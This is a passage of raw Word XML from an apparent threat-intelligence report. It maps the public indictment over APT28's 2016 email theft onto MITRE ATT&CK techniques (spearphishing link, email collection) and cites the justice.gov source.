          </w:tcPr>
          <w:p w14:paraId="4C09A79E" w14:textId="35483A66" w:rsidR="00842B32" w:rsidRPr="00842B32" w:rsidRDefault="00FB171C" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C5122C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">… </w:t>
            </w:r>
            <w:r w:rsidR="00842B32" w:rsidRPr="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">instructing </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29703EE7" w14:textId="77777777" w:rsidR="00842B32" w:rsidRPr="00842B32" w:rsidRDefault="00842B32" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">the user to change his password by clicking the embedded link. Those instructions </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262C4CB0" w14:textId="5229E9FA" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00842B32" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>were followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="13E0F3F2" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B092D5F" w14:textId="3698A371" w:rsidR="00FB171C" w:rsidRDefault="008B5957" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A1E6E3B" w14:textId="1C06E9F4" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="008B5957" w:rsidP="008D2933">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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C77834F" w14:textId="2D2B3668" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="008B5957" w:rsidP="008D2933">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1114 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Email Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF5382E" w14:textId="4B12C5E9" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="008B5957" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D790550" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56CDCEA3" w14:textId="6DD30CCB" w:rsidR="00FB171C" w:rsidRDefault="008B5957" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307D37BB" w14:textId="1041176D" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="005B1435" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FAE60F1" w14:textId="57E86765" w:rsidR="00842B32" w:rsidRPr="00842B32" w:rsidRDefault="00842B32" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">On or about March 21, 2016, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC9B06C" w14:textId="0E209F1E" w:rsidR="00842B32" w:rsidRPr="00842B32" w:rsidRDefault="00842B32" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>the co-conspirators stole the contents of the chairman’s email account, which</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ECFC5B8" w14:textId="77822C3F" w:rsidR="00FB171C" w:rsidRPr="00842B32" w:rsidRDefault="00842B32" w:rsidP="00842B32">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00842B32">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>consisted of over 50,000 emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="64C14552" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37FB450F" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D95287E" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3F2DA9" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C77599" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16F75A2F" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4B6A42" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A382DC2" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="484045C4" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F92B92" w:rsidRPr="00ED5880" w14:paraId="4A4EB152" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FEA6775" w14:textId="6AEE6351" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E8FD763" w14:textId="4FF8EB1C" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F46A950" w14:textId="1B6083E4" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">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1114 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Email Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24DA2C52" w14:textId="7C010F2B" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60E2F97D" w14:textId="77777777" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E8A16FC" w14:textId="6D181CED" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A0B4F1" w14:textId="511AADFA" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A4A2A8A" w14:textId="22018A20" w:rsidR="00F92B92" w:rsidRPr="00ED5880" w:rsidRDefault="00F92B92" w:rsidP="00F92B92">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Added to tidy Markov transitioning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E1BD927" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="0077286F" w:rsidRDefault="00FB171C" w:rsidP="00FB171C"/>
    <w:p w14:paraId="53398801" w14:textId="22C10C49" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="002E0F74">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">]  </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Indictment (justice.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDBE0B" w14:textId="77777777" w:rsidR="004E216B" w:rsidRDefault="004E216B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB24E3" w14:textId="7E871F6E" w:rsidR="00424F88" w:rsidRDefault="00424F88" w:rsidP="00424F88">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc153480850"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T1566.002 – INDICTMENT - The Grand Jury for the District of Columbia charges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A5F3B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">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FB171C" w:rsidRPr="002D1D50" w14:paraId="5B54E1E3" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7434407C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="139ABE06" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3278B217" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="6ABB6E85" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="626AB0E2" w14:textId="6035C4D8" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3210ABC3" w14:textId="2C5E7ABB" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="449A33A1" w14:textId="77777777" w:rsidR="00C55455" w:rsidRPr="00387DCC" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="693E86A8" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338BC5A6" w14:textId="22E7F270" w:rsidR="00C55455" w:rsidRPr="007328DE" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="142A4946" w14:textId="09656605" w:rsidR="00C55455" w:rsidRPr="007328DE" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1566.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3549BF59" w14:textId="77777777" w:rsidR="00C55455" w:rsidRPr="00387DCC" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="0234AB00" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC0C642" w14:textId="446DF220" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="648282AE" w14:textId="03D75056" w:rsidR="00C55455" w:rsidRPr="007328DE" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDC2998" w14:textId="77777777" w:rsidR="00C55455" w:rsidRPr="00387DCC" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="07B70329" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3990DF5D" w14:textId="6A0F2FED" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D5CDC1" w14:textId="3B0940FE" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
